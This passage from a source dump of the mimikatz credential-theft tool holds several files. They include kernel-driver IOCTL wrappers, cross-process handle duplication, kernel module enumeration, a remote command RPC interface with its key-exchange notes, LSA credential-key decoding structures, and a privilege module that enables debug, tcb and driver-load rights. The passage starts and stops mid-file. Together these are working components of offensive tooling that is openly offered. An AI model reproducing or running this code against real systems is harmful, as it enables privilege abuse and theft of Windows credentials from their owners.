LocalFree(*pBufferOut); 30 | } 31 | } 32 | } 33 | if(!status) 34 | { 35 | PRINT_ERROR(L"DeviceIoControl (0x%08x) : 0x%08x\n", ioctlCode, GetLastError()); 36 | if(autobuffer) 37 | LocalFree(*pBufferOut); 38 | } 39 | else if(pSzBufferOut) 40 | *pSzBufferOut = returned; 41 | return status; 42 | } 43 | 44 | BOOL kull_m_kernel_ioctl(PCWSTR driver, DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn, PVOID * pBufferOut, PDWORD pSzBufferOut, BOOL autobuffer) 45 | { 46 | BOOL status = FALSE; 47 | HANDLE hDriver; 48 | hDriver = CreateFile(driver, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); 49 | if(hDriver && hDriver != INVALID_HANDLE_VALUE) 50 | { 51 | status = kull_m_kernel_ioctl_handle(hDriver, ioctlCode, bufferIn, szBufferIn, pBufferOut, pSzBufferOut, autobuffer); 52 | CloseHandle(hDriver); 53 | } 54 | else 55 | PRINT_ERROR_AUTO(L"CreateFile"); 56 | return status; 57 | } 58 | 59 | BOOL kull_m_kernel_mimidrv_ioctl(DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn, PVOID * pBufferOut, PDWORD pSzBufferOut, BOOL autobuffer) 60 | { 61 | return kull_m_kernel_ioctl(L"\\\\.\\" MIMIKATZ_DRIVER, ioctlCode, bufferIn, szBufferIn, pBufferOut, pSzBufferOut, autobuffer); 62 | } 63 | 64 | BOOL kull_m_kernel_mimidrv_simple_output(DWORD ioctlCode, PVOID bufferIn, DWORD szBufferIn) 65 | { 66 | BOOL status = FALSE; 67 | PVOID buffer = NULL; 68 | DWORD i, szBuffer; 69 | 70 | if(status = kull_m_kernel_ioctl(L"\\\\.\\" MIMIKATZ_DRIVER, ioctlCode, bufferIn, szBufferIn, &buffer, &szBuffer, TRUE)) 71 | { 72 | for(i = 0; i < szBuffer / sizeof(wchar_t); i++) 73 | kprintf(L"%c", ((wchar_t *) buffer)[i]); 74 | LocalFree(buffer); 75 | } 76 | return status; 77 | } -------------------------------------------------------------------------------- /modules/kull_m_rdm.h: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #pragma once 7 | #include "globals.h" 8 | #include "kull_m_string.h" 9 | #include "kull_m_hid.h" // to adapt 10 | 11 | #define RDM_SLEEP_BEFORE_SEND 10 12 | #define RDM_SLEEP_BEFORE_RECV 10 13 | 14 | 15 | #define RDM_IOCTL_14443A_REQ 0x03 16 | #define RDM_IOCTL_14443A_ANTICOLL 0x04 17 | #define RDM_IOCTL_14443A_SELECT 0x05 18 | #define RDM_IOCTL_14443A_HALT 0x06 19 | 20 | #define RDM_IOCTL_14443B_REQ 0x09 21 | #define RDM_IOCTL_14443B_ANTICOLL 0x0a 22 | #define RDM_IOCTL_14443B_ATTRIB 0x0b 23 | #define RDM_IOCTL_14443B_RESET 0x0c 24 | 25 | #define RDM_IOCTL_14443_DIRECT 0x0d // ISO14443_TypeB_Transfer_Command (MF_TypeATransCOSCmd in code ?) 26 | 27 | #define RDM_IOCTL_15693_INVENTORY 0x10 28 | #define RDM_IOCTL_15693_READ 0x11 29 | #define RDM_IOCTL_15693_WRITE 0x12 30 | #define RDM_IOCTL_15693_LOCK_BLOCK 0x13 31 | #define RDM_IOCTL_15693_STAY_QUIET 0x14 32 | #define RDM_IOCTL_15693_SELECT 0x15 33 | #define RDM_IOCTL_15693_RESET_TO_READY 0x16 34 | #define RDM_IOCTL_15693_WRITE_AFI 0x17 35 | #define RDM_IOCTL_15693_LOCK_AFI 0x18 36 | #define RDM_IOCTL_15693_WRITE_DSFID 0x19 37 | #define RDM_IOCTL_15693_LOCK_DSFID 0x1a 38 | #define RDM_IOCTL_15693_GET_INFORMATION 0x1b 39 | #define RDM_IOCTL_15693_GET_MULTIPLE_BLOCK_SECURITY 0x1c 40 | #define RDM_IOCTL_15693_DIRECT 0x1d 41 | 42 | 43 | #define RDM_IOCTL_MF_READ 0x20 44 | #define RDM_IOCTL_MF_WRITE 0x21 45 | #define RDM_IOCTL_MF_INIT_VALUE 0x22 46 | #define RDM_IOCTL_MF_DEC 0x23 47 | #define RDM_IOCTL_MF_INC 0x24 48 | #define RDM_IOCTL_MF_GET_SNR 0x25 49 | 50 | #define RDM_IOCTL_MF_RESTORE 0x28 // ISO14443_TypeA_Transfer_Command(0X28) ? 51 | 52 | // SYSTEM COMMANDS 53 | #define RDM_IOCTL_SET_ADDRESS 0x80 54 | #define RDM_IOCTL_SET_BAUDRATE 0x81 55 | #define RDM_IOCTL_SET_SER_NUM 0x82 56 | #define RDM_IOCTL_GET_SER_NUM 0x83 57 | #define RDM_IOCTL_SET_USER_INFO 0x84 58 | #define RDM_IOCTL_GET_USER_INFO 0x85 59 | #define RDM_IOCTL_GET_VERSION 0x86 60 | #define RDM_IOCTL_CONTROL_LED1 0x87 61 | #define RDM_IOCTL_CONTROL_LED2 0x88 62 | #define RDM_IOCTL_CONTROL_BUZZER 0x89 63 | 64 | 65 | typedef struct _RDM_DEVICE { 66 | struct _RDM_DEVICE * next; 67 | DWORD id; 68 | PWCHAR DevicePath; 69 | HIDD_ATTRIBUTES hidAttributes; 70 | HIDP_CAPS hidCaps; 71 | HANDLE hDevice; 72 | } RDM_DEVICE, *PRDM_DEVICE; 73 | 74 | BOOL rdm_get_version(HANDLE hFile, PSTR *version); 75 | 76 | BOOL rdm_send_receive(HANDLE hFile, BYTE ctl, LPCVOID in, BYTE szIn, LPBYTE *out, BYTE *szOut); 77 | BOOL rdm_devices_get(PRDM_DEVICE *devices, DWORD *count); 78 | void rdm_devices_free(PRDM_DEVICE devices); -------------------------------------------------------------------------------- /modules/kull_m_handle.c: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #include "kull_m_handle.h" 7 | 8 | NTSTATUS kull_m_handle_getHandles(PKULL_M_SYSTEM_HANDLE_ENUM_CALLBACK callBack, PVOID pvArg) 9 | { 10 | NTSTATUS status; 11 | ULONG i; 12 | PSYSTEM_HANDLE_INFORMATION buffer = NULL; 13 | 14 | status = kull_m_process_NtQuerySystemInformation(SystemHandleInformation, &buffer, 0); 15 | if(NT_SUCCESS(status)) 16 | { 17 | for(i = 0; (i < buffer->HandleCount) && callBack(&buffer->Handles[i], pvArg); i++); 18 | LocalFree(buffer); 19 | } 20 | return status; 21 | } 22 | 23 | NTSTATUS kull_m_handle_getHandlesOfType(PKULL_M_HANDLE_ENUM_CALLBACK callBack, LPCTSTR type, DWORD dwDesiredAccess, DWORD dwOptions, PVOID pvArg) 24 | { 25 | UNICODE_STRING uStr; 26 | HANDLE_ENUM_DATA data = {NULL, dwDesiredAccess, dwOptions, callBack, pvArg}; 27 | if(type) 28 | { 29 | RtlInitUnicodeString(&uStr, type); 30 | data.type = &uStr; 31 | } 32 | return kull_m_handle_getHandles(kull_m_handle_getHandlesOfType_callback, &data); 33 | } 34 | 35 | BOOL CALLBACK kull_m_handle_getHandlesOfType_callback(PSYSTEM_HANDLE pSystemHandle, PVOID pvArg) 36 | { 37 | PHANDLE_ENUM_DATA pData = (PHANDLE_ENUM_DATA) pvArg; 38 | BOOL status = TRUE; 39 | HANDLE hProcess, hRemoteHandle; 40 | POBJECT_TYPE_INFORMATION pInfos; 41 | ULONG szNeeded; 42 | 43 | if(hProcess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, pSystemHandle->ProcessId)) 44 | { 45 | if(DuplicateHandle(hProcess, (HANDLE) pSystemHandle->Handle, GetCurrentProcess(), &hRemoteHandle, pData->dwDesiredAccess, TRUE, pData->dwOptions)) 46 | { 47 | if(NtQueryObject(hRemoteHandle, ObjectTypeInformation, NULL, 0, &szNeeded) == STATUS_INFO_LENGTH_MISMATCH) 48 | { 49 | if(pInfos = (POBJECT_TYPE_INFORMATION) LocalAlloc(LPTR, szNeeded)) 50 | { 51 | if(NT_SUCCESS(NtQueryObject(hRemoteHandle, ObjectTypeInformation, pInfos, szNeeded, &szNeeded))) 52 | { 53 | if(!pData->type || RtlEqualUnicodeString(&pInfos->TypeName, pData->type, TRUE)) 54 | status = pData->callBack(hRemoteHandle, pSystemHandle, pData->pvArg); 55 | } 56 | LocalFree(pInfos); 57 | } 58 | } 59 | CloseHandle(hRemoteHandle); 60 | } 61 | CloseHandle(hProcess); 62 | } 63 | return status; 64 | } 65 | 66 | BOOL kull_m_handle_GetUserObjectInformation(HANDLE hObj, int nIndex, PVOID *pvInfo, PDWORD nLength) 67 | { 68 | BOOL status = FALSE; 69 | DWORD szNeeded; 70 | 71 | if(!GetUserObjectInformation(hObj, nIndex, NULL, 0, &szNeeded) && (GetLastError() == ERROR_INSUFFICIENT_BUFFER) && szNeeded) 72 | { 73 | if(*pvInfo = LocalAlloc(LPTR, szNeeded)) 74 | { 75 | if(nLength) 76 | *nLength = szNeeded; 77 | if(!(status = GetUserObjectInformation(hObj, nIndex, *pvInfo, szNeeded, &szNeeded))) 78 | LocalFree(*pvInfo); 79 | } 80 | } 81 | return status; 82 | } -------------------------------------------------------------------------------- /mimidrv/mimidrv.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Release 6 | Win32 7 | 8 | 9 | Release 10 | x64 11 | 12 | 13 | 14 | {86FF6D04-208C-442F-B27C-E4255DD39402} 15 | MakeFileProj 16 | 17 | 18 | Makefile 19 | false 20 | v100 21 | 22 | 23 | 24 | $(SolutionDir)$(Platform)\ 25 | $(Platform)\ 26 | _build_.cmd $(Platform) $(SolutionDir)$(Platform)\ 27 | _clean_.cmd $(Platform) $(SolutionDir)$(Platform)\ 28 | _rebuild_.cmd $(Platform) $(SolutionDir)$(Platform)\ 29 | C:\WinDDK\7600.16385.1\inc;C:\WinDDK\7600.16385.1\inc\api;C:\WinDDK\7600.16385.1\inc\ddk 30 | WIN32;NDEBUG;_X86_ 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | -------------------------------------------------------------------------------- /mimicom.idl: -------------------------------------------------------------------------------- 1 | import "ms-dtyp.idl"; 2 | [ 3 | uuid(17FC11E9-C258-4B8D-8D07-2F4125156244), 4 | version(1.0) 5 | ] 6 | interface MimiCom 7 | { 8 | typedef [context_handle] void* MIMI_HANDLE; 9 | 10 | typedef unsigned int ALG_ID; 11 | typedef struct _MIMI_PUBLICKEY { 12 | ALG_ID sessionType; 13 | DWORD cbPublicKey; 14 | [size_is(cbPublicKey)] BYTE *pbPublicKey; 15 | } MIMI_PUBLICKEY, *PMIMI_PUBLICKEY; 16 | 17 | NTSTATUS MimiBind( 18 | [in] handle_t rpc_handle, 19 | [in, ref] PMIMI_PUBLICKEY clientPublicKey, 20 | [out, ref] PMIMI_PUBLICKEY serverPublicKey, 21 | [out, ref] MIMI_HANDLE *phMimi 22 | ); 23 | 24 | NTSTATUS MiniUnbind( 25 | [in, out, ref] MIMI_HANDLE *phMimi 26 | ); 27 | 28 | NTSTATUS MimiCommand( 29 | [in, ref] MIMI_HANDLE phMimi, 30 | [in] DWORD szEncCommand, 31 | [in, size_is(szEncCommand), unique] BYTE *encCommand, 32 | [out, ref] DWORD *szEncResult, 33 | [out, size_is(, *szEncResult)] BYTE **encResult 34 | ); 35 | 36 | NTSTATUS MimiClear( 37 | [in] handle_t rpc_handle, 38 | [in, string] wchar_t *command, 39 | [out] DWORD *size, 40 | [out, size_is(, *size)] wchar_t **result 41 | ); 42 | } 43 | 44 | // Privacy of RPC exchange can be ~guaranteed by protocol, *except when not using authentication* 45 | // mimikatz try to avoid clear credentials on the network by using basic encryption at application level. 46 | // 47 | // Diffie-Hellman key exchange 48 | // =========================== 49 | // 50 | // > Parameters used: Second Oakley Group ( https://tools.ietf.org/html/rfc2409#section-6.2 ) 51 | // 52 | // * ALG_ID sessionType 53 | // session key type to use after DH exchange, it can be: CALG_CYLINK_MEK(0x660c), CALG_RC2(0x6602), CALG_RC4(0x6801), CALG_DES(0x6601), CALG_3DES_112(0x6609) or CALG_3DES(0x6603) 54 | // see: https://msdn.microsoft.com/library/windows/desktop/bb394802.aspx and https://msdn.microsoft.com/library/windows/desktop/aa375549.aspx 55 | // 56 | // * DWORD cbPublicKey 57 | // size of pbPublicKey: 144 (sizeof(PUBLICKEYSTRUC) + sizeof(DHPUBKEY) + sizeof(1024bits key) 58 | // 59 | // * BYTE *pbPublicKey 60 | // PUBLICKEYBLOB structure of the DH key ( https://msdn.microsoft.com/en-us/library/windows/desktop/aa381970(v=vs.85).aspx#code-snippet-1 ) 61 | // 62 | // Example: 63 | // -------- 64 | // 06 02 00 00 PUBLICKEYBLOB (06), CUR_BLOB_VERSION (02), reserved (00 00) 65 | // 02 aa 00 00 ALG_ID: CALG_DH_EPHEM(0xaa02) 66 | // 67 | // 00 44 48 31 Magic : \0DH1 68 | // 00 04 00 00 1024bits (128bytes bellow) 69 | // a9 90 e8 86 59 2d 88 a7 32 e1 05 35 26 24 d9 fd 70 | // ae f5 53 46 ca a4 79 cc a9 a3 57 45 e8 54 e7 fd 71 | // fe 99 24 df 71 6a 44 2c f7 0a 09 ac e4 e6 44 f8 72 | // 4c 51 63 c3 86 1e 14 4a 9a f0 e0 a9 e0 38 26 72 73 | // 75 27 cb 60 9f 0d 15 2c 37 39 a0 b0 72 b6 14 85 74 | // 5f 18 7f c0 0d 26 d1 3b 6f 14 c1 99 22 8f 74 ef 75 | // 68 0c 24 bb 77 ff b3 c5 9e ed ff 76 71 c1 ee ce 76 | // eb 77 46 00 52 d8 4c 5c bc af fd 28 3d 76 83 b3 77 | // 78 | // > Don't forget you may need to reverse some key bytearrays from Windows point of view, and to reset session key state between calls ;) -------------------------------------------------------------------------------- /modules/rpc/kull_m_rpc_ms-credentialkeys.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "kull_m_rpc.h" 3 | 4 | typedef enum _KIWI_CREDENTIAL_KEY_TYPE { 5 | CREDENTIALS_KEY_TYPE_NTLM = 1, 6 | CREDENTIALS_KEY_TYPE_SHA1 = 2, 7 | CREDENTIALS_KEY_TYPE_ROOTKEY = 3, 8 | CREDENTIALS_KEY_TYPE_DPAPI_PROTECTION = 4, 9 | } KIWI_CREDENTIAL_KEY_TYPE; 10 | 11 | typedef struct _KIWI_CREDENTIAL_KEY { 12 | DWORD unkEnum; // version ? 13 | KIWI_CREDENTIAL_KEY_TYPE type; 14 | WORD iterations; 15 | WORD cbData; 16 | BYTE *pbData; 17 | } KIWI_CREDENTIAL_KEY, *PKIWI_CREDENTIAL_KEY; 18 | 19 | typedef struct _KIWI_CREDENTIAL_KEYS { 20 | DWORD count; 21 | KIWI_CREDENTIAL_KEY keys[ANYSIZE_ARRAY]; 22 | } KIWI_CREDENTIAL_KEYS, *PKIWI_CREDENTIAL_KEYS; 23 | 24 | void CredentialKeys_Decode(handle_t _MidlEsHandle, PKIWI_CREDENTIAL_KEYS * _pType); 25 | void CredentialKeys_Free(handle_t _MidlEsHandle, PKIWI_CREDENTIAL_KEYS * _pType); 26 | 27 | #define kull_m_rpc_DecodeCredentialKeys(/*PVOID */data, /*DWORD */size, /*PKIWI_CREDENTIAL_KEYS **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) CredentialKeys_Decode) 28 | #define kull_m_rpc_FreeCredentialKeys(/*PKIWI_CREDENTIAL_KEYS **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) CredentialKeys_Free) 29 | 30 | #define LSA_CREDENTIAL_KEY_PACKAGE_NAME L"LSACREDKEY" 31 | //#define LSA_CREDENTIAL_KEY_PACKAGE_ID 0x10000 // pseudo package id. must not collide with any other package id 32 | //#define LSA_CREDENTIAL_KEY_NAME "CredentialKeys" 33 | //#define LSA_CREDENTIAL_KEY_ROOT_KEY_ITERATIONS (1024 * 10) // in parity with cache logon verifier 34 | // 35 | //typedef enum _LSA_CREDENTIAL_KEY_SOURCE_TYPE { 36 | // eFromPrecomputed = 1, // used by Kerberos 37 | // eFromClearPassword, 38 | // eFromNtOwf, 39 | //} LSA_CREDENTIAL_KEY_SOURCE_TYPE, *PLSA_CREDENTIAL_KEY_SOURCE_TYPE; 40 | // 41 | //typedef enum _LSA_CREDENTIAL_KEY_TYPE { 42 | // eDPAPINtOwf = 1, // legacy NTOWF used by DPAPI 43 | // eDPAPISha1, // legacy SHA1 used by DPAPI 44 | // eRootKey, // PBKDF2(NTOWF), uplevel root key 45 | // eDPAPIProtection, // uplevel DPAPI protection key, derived from root key 46 | //} LSA_CREDENTIAL_KEY_TYPE, *PLSA_CREDENTIAL_KEY_TYPE; 47 | // 48 | //typedef struct _LSA_CREDENTIAL_KEY { 49 | // LSA_CREDENTIAL_KEY_SOURCE_TYPE SourceType; 50 | // LSA_CREDENTIAL_KEY_TYPE KeyType; 51 | // USHORT Iterations; 52 | // USHORT KeySize; 53 | //#ifdef MIDL_PASS 54 | // [size_is(KeySize)] 55 | //#endif // MIDL_PASS 56 | // PUCHAR KeyBuffer; 57 | //} LSA_CREDENTIAL_KEY, *PLSA_CREDENTIAL_KEY; 58 | // 59 | //typedef struct _LSA_CREDENTIAL_KEY_ARRAY { 60 | // USHORT KeyCount; 61 | //#ifdef MIDL_PASS 62 | // [size_is(KeyCount)] LSA_CREDENTIAL_KEY Keys[*]; 63 | //#else // MIDL_PASS 64 | // LSA_CREDENTIAL_KEY Keys[ANYSIZE_ARRAY]; 65 | //#endif // MIDL_PASS 66 | //} LSA_CREDENTIAL_KEY_ARRAY, *PLSA_CREDENTIAL_KEY_ARRAY; 67 | // 68 | //// 69 | //// convenience helper 70 | //// 71 | //typedef struct _LSA_CREDENTIAL_KEY_ARRAY_STORAGE { 72 | // USHORT KeyCount; 73 | // LSA_CREDENTIAL_KEY Keys[8]; 74 | //} LSA_CREDENTIAL_KEY_ARRAY_STORAGE, *PLSA_CREDENTIAL_KEY_ARRAY_STORAGE; -------------------------------------------------------------------------------- /mimidrv/kkll_m_modules.c: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #include "kkll_m_modules.h" 7 | 8 | NTSTATUS kkll_m_modules_enum(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PKKLL_M_MODULE_CALLBACK callback, PVOID pvArg) 9 | { 10 | NTSTATUS status = STATUS_SUCCESS; 11 | ULONG i, modulesSize, numberOfModules; 12 | PAUX_MODULE_EXTENDED_INFO pModules; 13 | BOOLEAN mustContinue = TRUE; 14 | 15 | status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), NULL); 16 | if(NT_SUCCESS(status) && modulesSize) 17 | { 18 | if(pModules = (PAUX_MODULE_EXTENDED_INFO) ExAllocatePoolWithTag(PagedPool, modulesSize, POOL_TAG)) 19 | { 20 | numberOfModules = modulesSize / sizeof(AUX_MODULE_EXTENDED_INFO); 21 | status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), pModules); 22 | for(i = 0; NT_SUCCESS(status) && mustContinue && (i < numberOfModules); i++) 23 | status = callback(szBufferIn, bufferIn, outBuffer, pModules + i, pvArg, &mustContinue); 24 | ExFreePoolWithTag(pModules, POOL_TAG); 25 | } 26 | } 27 | return status; 28 | } 29 | 30 | NTSTATUS kkll_m_modules_list_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PAUX_MODULE_EXTENDED_INFO pModule, PVOID pvArg, BOOLEAN * mustContinue) 31 | { 32 | return kprintf(outBuffer, L"0x%p - %u\t%S\n", pModule->BasicInfo.ImageBase, pModule->ImageSize, pModule->FullPathName + pModule->FileNameOffset); 33 | } 34 | 35 | NTSTATUS kkll_m_modules_fromAddr(PKIWI_BUFFER outBuffer, PVOID addr) 36 | { 37 | KKLL_M_MODULE_FROM_ADDR structAddr = {FALSE, (ULONG_PTR) addr}; 38 | NTSTATUS status = kkll_m_modules_enum(0, NULL, outBuffer, kkll_m_modules_fromAddr_callback, &structAddr); 39 | 40 | if(NT_SUCCESS(status) && !structAddr.isFound) 41 | status = kprintf(outBuffer, L"0x%p [ ? ]\n", addr); 42 | 43 | return status; 44 | } 45 | 46 | NTSTATUS kkll_m_modules_fromAddr_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PAUX_MODULE_EXTENDED_INFO pModule, PVOID pvArg, BOOLEAN * mustContinue) 47 | { 48 | NTSTATUS status = STATUS_SUCCESS; 49 | PKKLL_M_MODULE_FROM_ADDR pStructAddr = (PKKLL_M_MODULE_FROM_ADDR) pvArg; 50 | 51 | if((pStructAddr->addr >= (ULONG_PTR) pModule->BasicInfo.ImageBase) && (pStructAddr->addr < ((ULONG_PTR) pModule->BasicInfo.ImageBase + pModule->ImageSize))) 52 | { 53 | *mustContinue = FALSE; 54 | pStructAddr->isFound = TRUE; 55 | status = kprintf(outBuffer, L"0x%p [%S + 0x%x]\n", (PVOID) pStructAddr->addr, pModule->FullPathName + pModule->FileNameOffset, pStructAddr->addr - (ULONG_PTR) pModule->BasicInfo.ImageBase); 56 | } 57 | return status; 58 | } 59 | 60 | NTSTATUS kkll_m_modules_first_callback(SIZE_T szBufferIn, PVOID bufferIn, PKIWI_BUFFER outBuffer, PAUX_MODULE_EXTENDED_INFO pModule, PVOID pvArg, BOOLEAN * mustContinue) 61 | { 62 | *mustContinue = FALSE; 63 | ((PKKLL_M_MODULE_BASIC_INFOS) pvArg)->addr = (PUCHAR) pModule->BasicInfo.ImageBase; 64 | ((PKKLL_M_MODULE_BASIC_INFOS) pvArg)->size = pModule->ImageSize; 65 | return STATUS_SUCCESS; 66 | } -------------------------------------------------------------------------------- /modules/rpc/kull_m_rpc_ms-credentialkeys.c: -------------------------------------------------------------------------------- 1 | #include "kull_m_rpc_ms-credentialkeys.h" 2 | 3 | #if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64 4 | #define _ms_credentialkeys_MIDL_TYPE_FORMAT_STRING_SIZE 73 5 | #elif defined(_M_IX86) 6 | #define _ms_credentialkeys_MIDL_TYPE_FORMAT_STRING_SIZE 69 7 | #endif 8 | 9 | typedef struct _ms_credentialkeys_MIDL_TYPE_FORMAT_STRING { 10 | SHORT Pad; 11 | UCHAR Format[_ms_credentialkeys_MIDL_TYPE_FORMAT_STRING_SIZE]; 12 | } ms_credentialkeys_MIDL_TYPE_FORMAT_STRING; 13 | 14 | extern const ms_credentialkeys_MIDL_TYPE_FORMAT_STRING ms_credentialkeys__MIDL_TypeFormatString; 15 | static const RPC_CLIENT_INTERFACE mscredentialkeys___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0xd9ae4745, 0x178e, 0x4561, {0xa5, 0x3f, 0xf0, 0x84, 0xf9, 0x92, 0x13, 0xe5}}, {1, 0}}, {{0x8a885d04, 0x1ceb, 0x11c9, {0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000000}; 16 | static const MIDL_TYPE_PICKLING_INFO __MIDL_TypePicklingInfo = {0x33205054, 0x3, 0, 0, 0,}; 17 | static RPC_BINDING_HANDLE mscredentialkeys__MIDL_AutoBindHandle; 18 | static const MIDL_STUB_DESC mscredentialkeys_StubDesc = {(void *) &mscredentialkeys___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &mscredentialkeys__MIDL_AutoBindHandle, 0, 0, 0, 0, ms_credentialkeys__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0}; 19 | 20 | void CredentialKeys_Decode(handle_t _MidlEsHandle, PKIWI_CREDENTIAL_KEYS * _pType) 21 | { 22 | NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO) &__MIDL_TypePicklingInfo, &mscredentialkeys_StubDesc, (PFORMAT_STRING) &ms_credentialkeys__MIDL_TypeFormatString.Format[2], _pType); 23 | } 24 | 25 | void CredentialKeys_Free(handle_t _MidlEsHandle, PKIWI_CREDENTIAL_KEYS * _pType) 26 | { 27 | NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO) &__MIDL_TypePicklingInfo, &mscredentialkeys_StubDesc, (PFORMAT_STRING) &ms_credentialkeys__MIDL_TypeFormatString.Format[2], _pType); 28 | } 29 | #if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64 30 | static const ms_credentialkeys_MIDL_TYPE_FORMAT_STRING ms_credentialkeys__MIDL_TypeFormatString = {0, { 31 | 0x00, 0x00, 0x12, 0x00, 0x38, 0x00, 0x1b, 0x00, 0x01, 0x00, 0x17, 0x00, 0x0a, 0x00, 0x01, 0x00, 0x01, 0x5b, 0x1a, 0x03, 0x18, 0x00, 0x00, 0x00, 0x0a, 0x00, 0x0d, 0x0d, 0x06, 0x06, 0x40, 0x36, 32 | 0x5c, 0x5b, 0x12, 0x00, 0xe2, 0xff, 0x21, 0x03, 0x00, 0x00, 0x09, 0x00, 0xf8, 0xff, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x4c, 0x00, 0xda, 0xff, 0x5c, 0x5b, 0x1a, 0x03, 0x08, 0x00, 33 | 0xe6, 0xff, 0x00, 0x00, 0x08, 0x40, 0x5c, 0x5b, 0x00, 34 | }}; 35 | #elif defined(_M_IX86) 36 | static const ms_credentialkeys_MIDL_TYPE_FORMAT_STRING ms_credentialkeys__MIDL_TypeFormatString = {0, { 37 | 0x00, 0x00, 0x12, 0x00, 0x36, 0x00, 0x1b, 0x00, 0x01, 0x00, 0x17, 0x00, 0x0a, 0x00, 0x01, 0x00, 0x01, 0x5b, 0x1a, 0x03, 0x10, 0x00, 0x00, 0x00, 0x08, 0x00, 0x0d, 0x0d, 0x06, 0x06, 0x36, 0x5b, 38 | 0x12, 0x00, 0xe4, 0xff, 0x21, 0x03, 0x00, 0x00, 0x09, 0x00, 0xfc, 0xff, 0x01, 0x00, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x4c, 0x00, 0xdc, 0xff, 0x5c, 0x5b, 0x1a, 0x03, 0x04, 0x00, 0xe6, 0xff, 39 | 0x00, 0x00, 0x08, 0x5b, 0x00, 40 | }}; 41 | #endif -------------------------------------------------------------------------------- /plog/modules/kuhl_m_privilege.c: -------------------------------------------------------------------------------- 1 | /* Benjamin DELPY `gentilkiwi` 2 | blog.gentilkiwi.com 3 | benjamin@gentilkiwi.com 4 | Licence : creativecommons.org/licenses/by/4.0/ 5 | */ 6 | #include "kuhl_m_privilege.h" 7 | 8 | const KUHL_M_C kuhl_m_c_privilege[] = { 9 | {kuhl_m_privilege_debug, L"debug", L"Ask debug privilege"}, 10 | {kuhl_m_privilege_driver, L"driver", L"Ask load driver privilege"}, 11 | {kuhl_m_privilege_security, L"security", L"Ask security privilege"}, 12 | {kuhl_m_privilege_tcb, L"tcb", L"Ask tcb privilege"}, 13 | {kuhl_m_privilege_backup, L"backup", L"Ask backup privilege"}, 14 | {kuhl_m_privilege_restore, L"restore", L"Ask restore privilege"}, 15 | {kuhl_m_privilege_sysenv, L"sysenv", L"Ask system environment privilege"}, 16 | 17 | {kuhl_m_privilege_id, L"id", L"Ask a privilege by its id"}, 18 | {kuhl_m_privilege_name, L"name", L"Ask a privilege by its name"}, 19 | }; 20 | 21 | const KUHL_M kuhl_m_privilege = { 22 | L"privilege", L"Privilege module", NULL, 23 | ARRAYSIZE(kuhl_m_c_privilege), kuhl_m_c_privilege, NULL, NULL 24 | }; 25 | 26 | NTSTATUS kuhl_m_privilege_simple(ULONG privId) 27 | { 28 | ULONG previousState; 29 | NTSTATUS status = RtlAdjustPrivilege(privId, TRUE, FALSE, &previousState); 30 | if(NT_SUCCESS(status)) 31 | kprintf(L"Privilege \'%u\' OK\n", privId); 32 | else PRINT_ERROR(L"RtlAdjustPrivilege (%u) %08x\n", privId, status); 33 | return status; 34 | } 35 | 36 | NTSTATUS kuhl_m_privilege_id(int argc, wchar_t * argv[]) 37 | { 38 | NTSTATUS status = STATUS_INVALID_PARAMETER; 39 | if(argc) 40 | status = kuhl_m_privilege_simple(wcstoul(argv[0], NULL, 0)); 41 | else PRINT_ERROR(L"Missing \'id\'\n"); 42 | return status; 43 | } 44 | 45 | NTSTATUS kuhl_m_privilege_name(int argc, wchar_t * argv[]) 46 | { 47 | NTSTATUS status = STATUS_INVALID_PARAMETER; 48 | LUID luid; 49 | if(argc) 50 | { 51 | if(LookupPrivilegeValue(NULL, argv[0], &luid)) 52 | { 53 | if(!luid.HighPart) 54 | status = kuhl_m_privilege_simple(luid.LowPart); 55 | else PRINT_ERROR(L"LUID high part is %u\n", luid.HighPart); 56 | } 57 | else PRINT_ERROR_AUTO(L"LookupPrivilegeValue"); 58 | } 59 | else PRINT_ERROR(L"Missing \'name\'\n"); 60 | return status; 61 | } 62 | 63 | NTSTATUS kuhl_m_privilege_debug(int argc, wchar_t * argv[]) 64 | { 65 | return kuhl_m_privilege_simple(SE_DEBUG); 66 | } 67 | 68 | NTSTATUS kuhl_m_privilege_driver(int argc, wchar_t 